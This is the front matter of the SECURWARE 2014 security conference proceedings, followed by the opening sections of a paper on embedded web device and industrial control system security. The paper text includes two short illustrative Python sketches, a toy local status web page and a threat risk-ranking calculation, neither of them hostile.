SECURWARE 2014
The Eighth International Conference on Emerging Security Information, Systems
and Technologies
ISBN: 978-1-61208-376-6
November 16 - 20, 2014
Lisbon, Portugal
SECURWARE 2014 Editors
Rainer Falk, Siemens AG - München, Germany
Carlos Becker Westphall, Federal University of Santa Catarina, Brazil
SECURWARE 2014
Foreword
The Eighth International Conference on Emerging Security Information, Systems and
Technologies (SECURWARE 2014), held between November 16-20, 2014 in Lisbon, Portugal,
continued a series of events covering topics on the theory and practice of security,
cryptography, secure protocols, trust, privacy, confidentiality, vulnerability, intrusion detection,
and other areas related to law enforcement, security data mining, malware models, etc.
Security, defined as ensuring protected communication among terminals and user
applications across public and private networks, is the core of guaranteeing confidentiality,
privacy, and data protection. Security affects businesses and individuals, raises business risk,
and requires a corporate and individual culture. In the open business space offered by the
Internet, there is a need to improve defenses against hackers, disgruntled employees, and
commercial rivals. A balance is required between the effort and resources spent on security and
the security achieved. Some vulnerabilities can be addressed using the 80:20 rule, meaning that
80% of the vulnerabilities can be addressed for 20% of the costs. Other technical aspects concern
communication speed versus complex and time-consuming cryptography/security mechanisms
and protocols.
A Digital Ecosystem is defined as an open decentralized information infrastructure where
different networked agents, such as enterprises (especially SMEs), intermediate actors, public
bodies and end users, cooperate and compete enabling the creation of new complex structures.
In digital ecosystems, the actors, their products and services can be seen as different organisms
and species that are able to evolve and adapt dynamically to changing market conditions.
Digital Ecosystems lie at the intersection between different disciplines and fields:
industry, business, social sciences, biology, and cutting edge ICT and its application driven
research. They are supported by several underlying technologies such as semantic web and
ontology-based knowledge sharing, self-organizing intelligent agents, peer-to-peer overlay
networks, web services-based information platforms, and recommender systems.
We take this opportunity to warmly thank all the members of the SECURWARE
2014 Technical Program Committee, as well as the numerous reviewers. The creation of such a
high quality conference program would not have been possible without their involvement. We
also kindly thank all the authors who dedicated much of their time and efforts to contribute to
SECURWARE 2014. We truly believe that, thanks to all these efforts, the final conference
program consisted of top quality contributions.
Also, this event could not have been a reality without the support of many individuals,
organizations, and sponsors. We are grateful to the members of the SECURWARE 2014
organizing committee for their help in handling the logistics and for their work to make this
professional meeting a success.
We hope that SECURWARE 2014 was a successful international forum for the exchange
of ideas and results between academia and industry and for the promotion of progress in
emerging security information, systems and technologies.
We are convinced that the participants found the event useful and communications very
open. We hope Lisbon provided a pleasant environment during the conference and everyone
saved some time for exploring this beautiful city.
SECURWARE 2014 Chairs:
SECURWARE Advisory Chairs
Juha Röning, University of Oulu, Finland
Catherine Meadows, Naval Research Laboratory - Washington DC, USA
Petre Dini, Concordia University, Canada / China Space Agency Center - Beijing, China
Reijo Savola, VTT Technical Research Centre of Finland, Finland
Masaru Takesue, Hosei University, Japan
Mariusz Jakubowski, Microsoft Research, USA
Emmanoil Serelis, University of Piraeus, Greece
William Dougherty, Secern Consulting - Charlotte, USA
SECURWARE 2014 Industry Liaison Chair
Rainer Falk, Siemens AG - München, Germany
SECURWARE 2014 Research/Industry Chair
Mariusz Jakubowski, Microsoft Research, USA
SECURWARE 2014
Committee
SECURWARE Advisory Chairs
Juha Röning, University of Oulu, Finland
Catherine Meadows, Naval Research Laboratory - Washington DC, USA
Petre Dini, Concordia University, Canada / China Space Agency Center - Beijing, China
Reijo Savola, VTT Technical Research Centre of Finland, Finland
Masaru Takesue, Hosei University, Japan
Mariusz Jakubowski, Microsoft Research, USA
Emmanoil Serelis, University of Piraeus, Greece
William Dougherty, Secern Consulting - Charlotte, USA
SECURWARE 2014 Industry Liaison Chair
Rainer Falk, Siemens AG - München, Germany
SECURWARE 2014 Research/Industry Chair
Mariusz Jakubowski, Microsoft Research, USA
SECURWARE 2014 Technical Program Committee
Habtamu Abie, Norwegian Computing Center - Oslo, Norway
Afrand Agah, West Chester University of Pennsylvania, USA
Maurizio Aiello, National Research Council of Italy - IEIIT, Italy
Jose M. Alcaraz Calero, University of the West of Scotland, United Kingdom
Firkhan Ali Bin Hamid Ali, Universiti Tun Hussein Onn Malaysia, Malaysia
Hamada Alshaer, Khalifa University of Science, Technology & Research (KUSTAR), UAE
Claudio Agostino Ardagna, Università degli Studi di Milano, Italy
David Argles, Haven Consulting, UK
George Athanasiou, KTH Royal Institute of Technology, Sweden
Ilija Basicevic, University of Novi Sad, Serbia
Lejla Batina, Radboud University Nijmegen, The Netherlands
Georg T. Becker, University of Massachusetts Amherst, USA
Carlos Becker Westphall, Federal University of Santa Catarina, Brazil
Francisco Jose Bellido Outeiriño, University of Cordoba, Spain
Malek Ben Salem, Accenture Technology Labs, USA
Jorge Bernal Bernabé, University of Murcia, Spain
Catalin V. Birjoveanu, "Al.I.Cuza" University of Iasi, Romania
Lorenzo Blasi, Hewlett-Packard, Italy
Carlo Blundo, Università di Salerno, Italy
Wolfgang Boehmer, Technische Universitaet Darmstadt, Germany
Ravishankar Borgaonkar, Technical University Berlin and Deutsche Telekom Laboratories, Germany
Jérémy Briffaut, ENSI - Bourges, France
Julien Bringer, SAFRAN Morpho, France
Christian Callegari, University of Pisa, Italy
Juan Vicente Capella Hernández, Universidad Politécnica de Valencia, Spain
Hervé Chabanne, Morpho & Télécom ParisTech, France
Hyunseok Chang, Bell Labs/Alcatel-Lucent, USA
Fei Chen, VMware, Inc., USA
Lisha Chen-Wilson, University of Southampton, UK
Feng Cheng, Hasso-Plattner-Institute at University of Potsdam, Germany
Jin-Hee Cho, US Army Research Laboratory Adelphi, USA
Te-Shun Chou, East Carolina University - Greenville, USA
Cheng-Kang Chu, Institute for Infocomm, Singapore
Mario Ciampi, National Research Council of Italy - Institute for High Performance Computing and
Networking (ICAR-CNR), Italy
Stelvio Cimato, Università degli studi di Milano - Crema, Italy
David Chadwick, University of Kent, UK
Frédéric Cuppens, Télécom Bretagne, France
Pierre de Leusse, HSBC, Poland
Sagarmay Deb, Central Queensland University, Australia
Mourad Debbabi, Concordia University, Canada
Tassos Dimitriou, Computer Technology Institute, Greece / Kuwait University, Kuwait
Changyu Dong, University of Strathclyde, U.K.
Zheng Dong, Indiana University Bloomington, USA
Safwan El Assad, University of Nantes, France
El-Sayed El-Alfy, King Fahd University of Petroleum and Minerals - Dhahran, KSA
Wael Mohamed El-Medany, University Of Bahrain, Bahrain
Navid Emamdoost, University of Minnesota, USA
Keita Emura, National Institute of Information and Communications Technology (NICT), Japan
David Eyers, University of Otago, New Zealand
Rainer Falk, Siemens AG - München, Germany
Eduardo B. Fernandez, Florida Atlantic University - Boca Raton, USA
Luca Ferretti, University of Modena and Reggio Emilia, Italy
Ulrich Flegel, HFT Stuttgart University of Applied Sciences, Germany
Anders Fongen, Norwegian Defence Research Establishment, Norway
Robert Forster, Edgemount Solutions, USA
Keith Frikken, Miami University, USA
Somchart Fugkeaw, Thai Digital ID Co., Ltd. - Bangkok, Thailand
Amparo Fuster-Sabater, Information Security Institute (CSIC), Spain
Clemente Galdi, Università di Napoli “Federico II”, Italy
Amjad Gawanmeh, Khalifa University of Science, Technology & Research - Sharjah, UAE
Bogdan Ghita, Plymouth University, UK
Danilo Gligoroski, Norwegian University of Science and Technology, Norway
Luis Gomes, Universidade Nova de Lisboa, Portugal
Hidehito Gomi, Yahoo! JAPAN Research, Japan
Pankaj Goyal, MicroMega, Inc., USA
Stefanos Gritzalis, University of the Aegean, Greece
Vic Grout, Glyndŵr University - Wrexham, UK
Yao Guo, Peking University, China
Bidyut Gupta, Southern Illinois University Carbondale, USA
Kevin Hamlen, University of Texas at Dallas, U.S.A.
Petr Hanáček, Brno University of Technology - Czech Republic
Ragib Hasan, University of Alabama at Birmingham, USA
Benjamin Hirsch, EBTIC / Khalifa University of Science Technology & Research - Abu Dhabi, UAE
Hans-Joachim Hof, Munich University of Applied Sciences, Germany
Fu-Hau Hsu, National Central University, Taiwan
Jiankun Hu, Australian Defence Force Academy - Canberra, Australia
Sergio Ilarri, University of Zaragoza, Spain
Mariusz Jakubowski, Microsoft Research, USA
Ravi Jhawar, Università degli Studi di Milano, Italy
Dan Jiang, Philips Research Shanghai, China
Andrew Jones, Khalifa University of Science Technology and Research - Abu Dhabi, UAE
Dimitrios A. Karras, Chalkis Institute of Technology, Hellas
Vasileios Karyotis, NTUA, Greece
Masaki Kasuya, Rakuten Inc., Japan
Sokratis K. Katsikas, University of Piraeus, Greece
Hyunsung Kim, Kyungil University, Korea
Kwangjo Kim, KAIST, Korea
Daniel Kimmig, Karlsruhe Institute of Technology, Germany
Ezzat Kirmani, St. Cloud State University, USA
Geir M. Køien, University of Agder, Norway
Stephan Kopf, University of Mannheim, Germany
Hristo Koshutanski, University of Malaga, Spain
Igor Kotenko, St. Petersburg Institute for Informatics and Automation of the Russian Academy of Science
(SPIIRAS), Russia
Stephan Krenn, IBM Research - Zurich, Switzerland
Jakub Kroustek, Brno University of Technology, Czech Republic
Lam-for Kwok, City University of Hong Kong, Hong Kong
Ruggero Donida Labati, Università degli Studi di Milano, Italy
Jean-François Lalande, Ecole Nationale Supérieure d'Ingénieurs de Bourges, France
Gyungho Lee, Korea University - Seoul, Korea
Marcello Leida, Khalifa University - Abu Dhabi, UAE
Zhuowei Li, Microsoft, USA
Giovanni Livraga, Università degli Studi di Milano - Crema, Italy
Jaime Lloret Mauri, Polytechnic University of Valencia, Spain
Jiqiang Lu, Institute for Infocomm Research, Singapore
Flaminia L. Luccio, University Ca' Foscari Venezia, Italy
Wissam Mallouli, Montimage, France
Feng Mao, EMC, USA
Milan Marković, Banca Intesa ad Beograd, Serbia
Juan Manuel Marín Pérez, University of Murcia, Spain
Claudia Marinica, ENSEA/University of Cergy-Pontoise/CNRS - Cergy-Pontoise, France
Gregorio Martinez, University of Murcia, Spain
Ádám Földes Máté, Budapest University of Technology and Economics (BME), Hungary
Wojciech Mazurczyk, Warsaw University of Technology, Poland
Catherine Meadows, Naval Research Laboratory-Washington DC, USA
Yuxin Meng, City University of Hong Kong, Hong Kong
Carla Merkle Westphall, Federal University of Santa Catarina, Brazil
Ajaz Hussain Mir, National Institute of Technology Srinagar - Kashmir, India
Hasan Mirjalili, EPFL - Lausanne, Switzerland
Rabeb Mizouni, Khalifa University of Science, Technology & Research (KUSTAR) - Abu Dhabi, UAE
Masoud Mohammadian, University of Canberra, Australia
Theodosis Mourouzis, University College London, U.K.
Jose M. Moya, Universidad Politécnica de Madrid, Spain
Antonio Nappa, IMDEA Software Institute, Spain
David Navarro, Ecole Centrale de Lyon, France
Mathew Nicho, University of Dubai, UAE
Jason R.C. Nurse, Cyber Security Centre - University of Oxford, UK
Jose A. Onieva, Universidad de Malaga, Spain
Andres Ortiz, Universidad de Málaga, Spain
Federica Paganelli, National Interuniversity Consortium for Telecommunications (CNIT), Italy
Alain Patey, Morpho Issy-Les-Moulineaux, France
Alwyn Roshan Pais, National Institute of Technology Karnataka, India
Carlos Enrique Palau Salvador, Universidad Politecnica de Valencia, Spain
András Pataricza, Budapest University of Technology and Economics, Hungary
Al-Sakib Khan Pathan, International Islamic University Malaysia (IIUM) - Kuala Lumpur, Malaysia
Ella Pereira, Edge Hill University, UK
Pedro Peris López, Universidad Carlos III de Madrid, Spain
Zeeshan Pervez, University of the West of Scotland, UK
Alexander Polyakov, ERPScan / EAS-SEC Organization, Russia
Sergio Pozo Hidalgo, University of Seville, Spain
M. Zubair Rafique, KU Leuven, Belgium
Sherif Rashad, Morehead State University, USA
Danda B. Rawat, Georgia Southern University, USA
Indrajit Ray, Colorado State University, U.S.A.
Tzachy Reinman, The Hebrew University of Jerusalem, Israel
Shangping Ren, Illinois Institute of Technology - Chicago, USA
Eric Renault, Institut Mines-Télécom - Télécom SudParis, France
Eike Ritter, University of Birmingham, U.K.
Jean-Marc Robert, École de technologie supérieure - Montréal, Canada
Juha Röning, University of Oulu, Finland
Heiko Rossnagel, Fraunhofer IAO - Stuttgart, Germany
Jonathan Rouzaud-Cornabas, INRIA - Lyon, France
Domenico Rotondi, TXT e-solutions SpA, Italy
Antonio Ruiz Martínez, University of Murcia, Spain
Giovanni Russello, University of Auckland, New Zealand
Mohammed Saeed, University of Chester, UK
Rodrigo Sanches Miani, Universidade Federal de Uberlândia, Brazil
Reijo Savola, VTT Technical Research Centre of Finland, Finland
Mohamad Sbeiti, Technische Universität Dortmund, Germany
Roland Schmitz, Hochschule der Medien Stuttgart, Germany
Yuichi Sei, University of Electro-Communications, Japan
Jun Shao, Zhejiang Gongshang University, China
George Spanoudakis, City University London, UK
Lars Strand, Nofas, Norway
Krzysztof Szczypiorski, Warsaw University of Technology, Poland
Gang Tan, Lehigh University, USA
Li Tan, Washington State University, USA
Toshiaki Tanaka, KDDI R & D Laboratories Inc., Japan
Carlos Miguel Tavares Calafate, Universidad Politécnica de Valencia, Spain
Enrico Thomae, operational services GmbH & Co. KG, Germany
Tony Thomas, Indian Institute of Information Technology and Management - Kerala, India
Panagiotis Trimintzios, European Network and Information Security Agency (ENISA), Greece
Raylin Tso, National Chengchi University, Taiwan
Ion Tutanescu, University of Pitesti, Romania
Shambhu Upadhyaya, State University of New York at Buffalo, USA
Miroslav Velev, Aries Design Automation, USA
José Francisco Vicent Francés, University of Alicante, Spain
Calin Vladeanu, "Politehnica" University of Bucharest, Romania
Tomasz Walkowiak, Wrocław University of Technology, Poland
Alex Hai Wang, The Pennsylvania State University, USA
Shiyuan Wang, Google Inc., USA
Wendy Hui Wang, Stevens Institute of Technology - Hoboken, USA
Wenhua Wang, Marin Software Company, USA
Steffen Wendzel, Fraunhofer FKIE, Bonn, Germany
Matthias Wieland, Universitaet Stuttgart, Germany
Wojciech Wodo, Wroclaw University of Technology, Poland
Tzong-Chen Wu, National Taiwan University of Science & Technology, Taiwan
Yongdong Wu, Institute for Infocomm Research, Singapore
Yang Xiang, Deakin University - Melbourne Burwood Campus, Australia
Sung-Ming Yen, National Central University, Taiwan
Xie Yi, Sun Yat-Sen University - Guangzhou, P. R. China
Xun Yi, Victoria University - Melbourne, Australia
Hiroshi Yoshiura, The University of Electro-Communications, Japan
Heung Youl Youm, KIISC, Korea
Amr Youssef, Concordia University - Montreal, Canada
Jun Zhang, Deakin University, Geelong Waurn Ponds Campus, Australia
Wenbing Zhao, Cleveland State University, USA
Yao Zhao, Beijing Jiaotong University, P. R. China
Xinliang Zheng, Frostburg State University, USA
Albert Zomaya, The University of Sydney, Australia
Copyright Information
For your reference, this is the text governing the copyright release for material published by IARIA.
The copyright release is a transfer of publication rights, which allows IARIA and its partners to drive the
dissemination of the published material. This allows IARIA to give articles increased visibility via
distribution, inclusion in libraries, and arrangements for submission to indexes.
I, the undersigned, declare that the article is original, and that I represent the authors of this article in
the copyright release matters. If this work has been done as work-for-hire, I have obtained all necessary
clearances to execute a copyright release. I hereby irrevocably transfer exclusive copyright for this
material to IARIA. I give IARIA permission to reproduce the work in any media format such as, but not
limited to, print, digital, or electronic. I give IARIA permission to distribute the materials without
restriction to any institutions or individuals. I give IARIA permission to submit the work for inclusion in
article repositories as IARIA sees fit.
I, the undersigned, declare that to the best of my knowledge, the article does not contain libelous or
otherwise unlawful content, does not invade the right of privacy, and does not infringe on a proprietary right.
Following the copyright release, any circulated version of the article must bear the copyright notice and
any header and footer information that IARIA applies to the published article.
IARIA grants royalty-free permission to the authors to disseminate the work, under the above
provisions, for any academic, commercial, or industrial use. IARIA grants royalty-free permission to any
individuals or institutions to make the article available electronically, online, or in print.
IARIA acknowledges that rights to any algorithm, process, procedure, apparatus, or articles of
manufacture remain with the authors and their employers.
I, the undersigned, understand that IARIA will not be liable, in contract, tort (including, without
limitation, negligence), pre-contract or other representations (other than fraudulent
misrepresentations) or otherwise in connection with the publication of my work.
Exception to the above is made for work-for-hire performed while employed by the government. In that
case, copyright to the material remains with the said government. The rightful owners (authors and
government entity) grant unlimited and unrestricted permission to IARIA, IARIA's contractors, and
IARIA's partners to further distribute the work.
Table of Contents
Embedded Web Device Security
Michael Riegler and Johannes Sametinger
1
Design Issues in the Construction of a Cryptographically Secure Instant Message Service for Android
Smartphones
Alexandre Braga and Daniela Schwab
7
Resisting Flooding Attacks on AODV
Mohamed A. Abdelshafy and Peter J.B. King
14
The Policy-Based AS_PATH Verification to Monitor AS Path Hijacking
Je-Kuk Yun, Beomseok Hong, and Yanggon Kim
20
A New Property Coding in Text Steganography of Microsoft Word Documents
Ivan Stojanov, Aleksandra Mileva, and Igor Stojanovic
25
Audio Steganography by Phase Modification
Fatiha Djebbar and Beghdad Ayad
31
Current Issues in Cloud Computing Security and Management
Pedro Artur Figueiredo Vitti, Daniel Ricardo dos Santos, Carlos Becker Westphall, Carla Merkle Westphall, and
Kleber Magno Maciel Vieira
36
N-Gram-Based User Behavioral Model for Continuous User Authentication
Leslie Milton, Bryan Robbins, and Atif Memon
43
GAIA-MLIS: A Maturity Model for Information Security
Roger William Coelho, Gilberto Fernandes Junior, and Mario Lemes Proenca Junior
50
Security of Vehicular Networks: Static and Dynamic Control of Cyber-Physical Objects
Vladimir Muliukha, Vladimir Zaborovsky, and Sergey Popov
56
Digital Signature of Network Segment Using Genetic Algorithm and Ant Colony Optimization Metaheuristics
Paulo R. G. Hernandes Jr., Luiz F. Carvalho, Gilberto Fernandes Jr., and Mario L. Proenca Jr.
62
DeadDrop-in-a-Flash: Information Hiding at SSD NAND Flash Memory Physical Layer
Avinash Srinivasan, Jie Wu, Panneer Santhalingam, and Jeffrey Zamanski
68
Saving Privacy in Trust-Based User-Centric Distributed Systems
Alessandro Aldini
76
Enhancing Privacy on Identity Providers
Rafael Weingartner and Carla Merkle Westphall
82
Enforcing Security Policies on Choreographed Services Using Rewriting Techniques
Karim Dahmani and Mahjoub Langar
89
Obtaining Strong Identifiers Through Attribute Aggregation
Walter Priesnitz Filho and Carlos Nuno da Cruz Ribeiro
96
Wi-Fi Intruder Detection
Rui Fernandes, Tiago Varum, Nuno Matos, and Pedro Pinho
101
Adding Secure Deletion to an Encrypted File System on Android Smartphones
Alexandre Braga and Alfredo Colito
106
Performance Impacts in Database Privacy-Preserving Biometric Authentication
Jana Dittmann, Veit Koppen, Christian Kratzer, Martin Leuckert, Gunter Saake, and Claus Vielhauer
111
Data Quality and Security Evaluation Tool for Nanoscale Sensors
Leon Reznik and Sergey Lyshevski
118
AndroSAT: Security Analysis Tool for Android Applications
Saurabh Oberoi, Weilong Song, and Amr Youssef
124
Involvers’ Behavior-based Modeling in Cyber Targeted Attack
Youngsoo Kim and Ikkyun Kim
132
Test Case Generation Assisted by Control Dependence Analysis
Puhan Zhang, Qi Wang, Guowei Dong, Bin Liang, and Wenchang Shi
138
Implementation Issues in the Construction of Standard and Non-Standard Cryptography on Android Devices
Alexandre Braga and Eduardo Morais
144
Threshold Proxy Signature Based on Position
Qingshui Xue, Fengying Li, and Zhenfu Cao
151
Linearity Measures for Multivariate Public Key Cryptography
Simona Samardjiska and Danilo Gligoroski
157
Managed Certificate Whitelisting - A Basis for Internet of Things Security in Industrial Automation Applications
Rainer Falk and Steffen Fries
167
Challenges for Evolving Large-Scale Security Architectures
Geir Koien
173
A Backtracking Symbolic Execution Engine with Sound Path Merging
Andreas Ibing
180
Security Extensions for Mobile Commerce Objects
Nazri Bin Abdullah, Ioannis Kounelis, and Sead Muftic
186
Attack Surface Reduction for Web Services based on Authorization Patterns
Roland Steinegger, Johannes Schafer, Max Vogler, and Sebastian Abeck
194
Evaluation of Vehicle Diagnostics Security – Implementation of a Reproducible Security Access
Martin Ring, Tobias Rensen, and Reiner Kriesten
202
An AMI Threat Detection Mechanism Based on SDN Networks
Po-Wen Chi, Chien-Ting Kuo, He-Ming Ruan, Shih-Jen Chen, and Chin-Laung Lei
208
Ghost Map: Proving Software Correctness using Games
Ronald Watro, Kerry Moffitt, Talib Hussain, Daniel Wyschogrod, John Ostwald, Derrick Kong, Clint Bowers,
Eric Church, Joshua Guttman, and Qinsi Wang
212
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Embedded Web Device Security
Michael Riegler
IT Solutions, RMTec
Baumgartenberg, Austria
michael.riegler@rmtec.at

Johannes Sametinger
Dept. of Information Systems – Software Engineering
Johannes Kepler University
Linz, Austria
johannes.sametinger@jku.at
Abstract—Due to the increasing networking of devices and services into the Internet of Things, security requirements are rising. Systems that were previously operated in isolation can be attacked over the Internet today. Industrial control systems often form the core of critical infrastructures, and their vulnerabilities and overly lax security management can have fatal consequences. With the help of vulnerability databases and search engines, hackers can get instructions and targets to exploit. Routers, printers, cameras, and other devices can be the gateway to the home or corporate network. Cyber criminals can enter sensitive areas through inadequately protected remote access. In a case study of a central water supply control system, we present typical security problems. We show that security vulnerabilities are widespread in current embedded web devices and demonstrate that appropriate countermeasures can reduce the attack surface significantly.
Keywords-web; embedded devices; web security; industrial control systems.

I. INTRODUCTION

Embedded devices increasingly include connectivity as a standard feature, putting them at risk of malicious attack if not secured properly. Some device vendors offer solutions to protect their embedded devices, including anti-malware technology, access control, data encryption, and real-time threat analysis, as well as maintenance, support, and update/patch services [8]. However, there is insufficient awareness among both device manufacturers and their users of the risks that stem from lacking protection. Take medical devices as an example. Today, even heart pacemakers communicate wirelessly. Parameter settings can be sent to the devices, and usage data, including alerts, are automatically sent to manufacturers and clinics. If not properly secured, these devices are a threat to patients’ privacy as well as to their well-being and even their lives [12]. Users of devices like personal computers and smartphones, as well as operators of web servers, are typically aware to some extent of the security risks. Security risks of devices that we use more unobtrusively often go unnoticed. Such devices include printers, routers, and cameras [14]. Their use is widespread, they are connected to the Internet, they often provide web interfaces, and they are often unprotected. On the road to a secure Internet of Things (IoT) [3], we will have to do our homework and provide security as needed to all devices.

In this paper, we will describe security issues of what we call embedded web devices, i.e., embedded devices with web access. We will outline the importance of the security of such devices, demonstrate how neglected it is, and also present a case study of a water supply facility. The paper is structured as follows. Section II introduces embedded web devices. In Section III, we outline security aspects. Risks to industrial control systems are described in Section IV. Section V explains how vulnerable web devices can be found on the Internet. A case study is given in Section VI. Related work and a conclusion follow in Sections VII and VIII, respectively.

Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
II. EMBEDDED WEB DEVICES

The Internet started as a DARPA project, interconnecting computers through which everyone could quickly access data and programs from any site. Today’s Internet provides access to a plethora of information, not just from computers – back then, only mainframes were available – but from devices like smartphones and television sets. Additionally, access is not limited to other computers but is increasingly available to other devices like printers, routers, or webcams. Web devices are any devices that are connected to the Internet via the Hypertext Transfer Protocol (HTTP), including web servers, personal computers, and smartphones. Embedded web devices have a different focus than just providing and retrieving information on the web. We have already mentioned printers, routers, and webcams. Additional examples include network devices, sensors in smart homes, smart meters in smart grids, smart TVs, etc.
A. Embedded Web Servers

Web servers run on a combination of hardware and software. They deliver web content to be accessed through the Internet. Embedded web servers are components of systems that, like web servers, communicate via HTTP. Typically, they provide a thin client interface for traditional applications. Lightweight web servers work with small resources and are often used in embedded systems. Examples include Barracuda [41], Mongoose [26], Appweb [2], and RomPager [33]. Embedded web servers are used for special purposes and are not as extensive as major web servers like Apache [1] and Microsoft’s IIS [25].

Embedded web servers are important for the IoT. Today, computers and the Internet are almost completely dependent on humans for information. Radio-frequency Identification (RFID) and sensor technology enable computers to observe
and identify the world without the limitations of data entered
by humans [3]. IoT refers to uniquely identifiable objects,
e.g., sensors having an Internet Protocol (IP) address, and
their virtual representations in the Internet.
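As a rough, hypothetical illustration of the thin web interface such devices expose (not taken from the paper, and far simpler than embedded servers like RomPager or Mongoose), a device status page of this kind can be sketched with Python's standard library; the device name and sensor fields are invented:

```python
# Sketch of an embedded-style web device: a node that serves its
# current readings as a tiny HTML status page over HTTP.
# Device name, fields, and values are invented for illustration.
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen

SENSOR_STATE = {"device": "pump-station-1", "pressure_bar": 4.2, "valve": "open"}

def render_status(state):
    """Render the device state as the HTML body of the status page."""
    rows = "".join(f"<li>{k}: {v}</li>" for k, v in state.items())
    return f"<html><body><h1>Device status</h1><ul>{rows}</ul></body></html>"

class StatusHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = render_status(SENSOR_STATE).encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass  # silence per-request logging

def serve_once():
    """Start the server on an ephemeral port, fetch the page once, shut down."""
    server = HTTPServer(("127.0.0.1", 0), StatusHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        with urlopen(f"http://127.0.0.1:{server.server_port}/") as resp:
            return resp.read().decode("utf-8")
    finally:
        server.shutdown()

if __name__ == "__main__":
    print(serve_once())
```

Note that this page requires no authentication at all: exactly the kind of exposure that, on a real device reachable from the Internet, the paper identifies as a risk.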
B. ICS – Industrial Control Systems
The term Industrial Control System (ICS) encompasses
several types of control systems that are used in industrial
production. Examples are Supervisory Control and Data
Acquisition (SCADA) systems, Distributed Control Systems
(DCS), and Programmable Logic Controllers (PLC). ICSs
are instrumental in the production of goods and in the provision of essential services, e.g., to monitor and control processes like gas and electricity distribution or water treatment.
The largest group of ICS is SCADA. For example, all nine
Austrian Danube power plants are controlled centrally from
Vienna. The stations are connected with optical fibers to the
central control room and cannot easily be accessed over the
Internet [42].
C. CPS – Cyber Physical Systems

Embedded systems contain computer systems with dedicated functions within larger mechanical or electrical systems, often having real-time computing constraints [13]. In Cyber Physical Systems (CPS), computational elements collaborate to control physical entities. CPSs tightly integrate cyber objects and physical objects. They can be systems at various scales, e.g., large smart bridges with fluctuation detection and response functions, autonomous cars, and tiny implanted medical devices [15].
III. SECURITY

Security is about protecting information and information systems, including embedded devices, from unauthorized access and use. The core goals are to retain the confidentiality, integrity, and availability of information. Frequently used terms include IT security, network security, computer security, web security, mobile security, and software security. They describe different, but sometimes overlapping, aspects of reaching the above-mentioned core goals. For example, software security is “the idea of engineering software so that it continues to function correctly under malicious attack” [23], while network security involves the isolation and protection of assets via firewalls, demilitarized zones, and intrusion detection systems.
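Later in this section, risk is framed as a function of a threat's probability and the associated cost if the threat becomes true. As a toy numeric sketch of that idea (all threat names and figures below are invented, not the paper's data):

```python
# Toy risk assessment: rank hypothetical threats by expected cost,
# i.e., probability of occurrence times cost if the threat materializes.
threats = [
    # (threat, probability per year, cost if it occurs)
    ("default admin password abused", 0.30, 50_000),
    ("unpatched web server exploited", 0.10, 200_000),
    ("physical break-in at remote site", 0.01, 500_000),
]

def risk_ranking(items):
    """Return (threat, expected cost) pairs sorted highest risk first."""
    scored = [(name, p * cost) for name, p, cost in items]
    return sorted(scored, key=lambda t: t[1], reverse=True)

for name, expected_cost in risk_ranking(threats):
    print(f"{name}: expected annual cost {expected_cost:,.0f}")
```

Such a ranking makes the 80:20 trade-off concrete: mitigation effort goes to the top entries first, even though the rarest threat here has the highest per-incident cost.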
A. Threats, Vulnerabilities, Risks

Threats refer to the sources and means of particular types of attacks. Vulnerabilities are security bugs or flaws in a system that allow successful attacks. A security risk is the likelihood of being targeted by a given threat. The most important potential threats can be determined with a risk assessment: we enumerate the most critical and most likely threats and evaluate the level of risk of each as a function of the probability of the threat and the cost incurred if it materializes. Secure devices have to continue to function correctly even while under malicious attack. Vulnerabilities are mistakes in devices, typically in software, that can be exploited directly to gain access to the device. They pose a threat to the device itself, to the information it contains, to other devices it communicates with, and to the environment that it manipulates.

B. ICS Security

ICSs are often found in critical infrastructures and thus have a high need for security. A typical information network prioritizes its security objectives as CIA, i.e., first confidentiality and integrity, and then availability. Industrial control systems, in contrast, have a high need for availability, which reverses the order of the security objectives for most control entities [8]. Table II shows these different security goals.

TABLE II. SECURITY GOALS IN IT AND ICS SYSTEMS

Priority | IT system       | ICS system
---------|-----------------|----------------
1        | Confidentiality | Availability
2        | Integrity       | Integrity
3        | Availability    | Confidentiality

There are other crucial differences that have an influence on the security of these systems; Table I summarizes some of them. For example, ICSs are usually real-time systems, whereas in IT systems delays are acceptable most of the time. Also, an ICS has to run continuously and cannot simply be rebooted. More details are given by Stouffer et al. [36].

TABLE I. DIFFERENCES BETWEEN TYPICAL IT AND ICS SYSTEMS

Category         | IT system                | ICS system
-----------------|--------------------------|-----------------
Performance      | Delay acceptable         | Real-time
Availability     | Reboot acceptable        | 24 x 7 x 365
Risk             | Data confidentiality     | Human safety
Interaction      | Less critical            | Critical
System           | Standard OS              | Proprietary OS
Resources        | Sufficient               | Limited
Lifetime         | 3-5 years                | 5-20 years
Support          | Diversified              | Single vendor
Location         | Local, easily accessible | Remote, isolated
Virus protection | Standard                 | Complex

According to a security survey, 70% of SCADA system operators consider the risks to their systems to be high to severe, and 33% suspect they may already have had incidents [21]. While IT security is not entirely different from ICS security, there are several differences; see [22]:
• ICS security failures often have physical consequences, and thus a more severe and immediate impact.
• ICS security failures can easily and wrongly be interpreted as traditional maintenance failures, making them more difficult to diagnose and remedy.
Security management of an ICS is often much more difficult than that of a regular IT system. ICSs more often rely on
old systems that cannot be patched or upgraded any more.
They often do not have a suitable testing environment. They
also often require frequent remote access with commands
that must not be blocked for safety or production issues [22].
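The qualitative risk assessment described in Section III-A, scoring each threat by its probability and by the cost incurred if it materializes, can be sketched in a few lines. The threat names, scales and scores below are illustrative examples, not taken from the paper:

```python
# Illustrative risk scoring: risk = probability x cost, both on a 1-5 scale.
# The threats and their scores are hypothetical examples.
threats = {
    "default credentials left enabled": (4, 4),   # (probability, cost)
    "unpatched firmware vulnerability": (3, 5),
    "denial of service on pump control": (2, 5),
}

def risk_level(probability: int, cost: int) -> int:
    """Risk as a function of threat probability and associated cost."""
    return probability * cost

# Rank threats so that the most critical ones are addressed first.
ranked = sorted(threats, key=lambda t: risk_level(*threats[t]), reverse=True)
for name in ranked:
    p, c = threats[name]
    print(f"{risk_level(p, c):2d}  {name}")
```

Ranking by such a score is exactly the enumeration step of the assessment: it makes explicit which threats deserve the limited security budget first.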
IV. RISKS
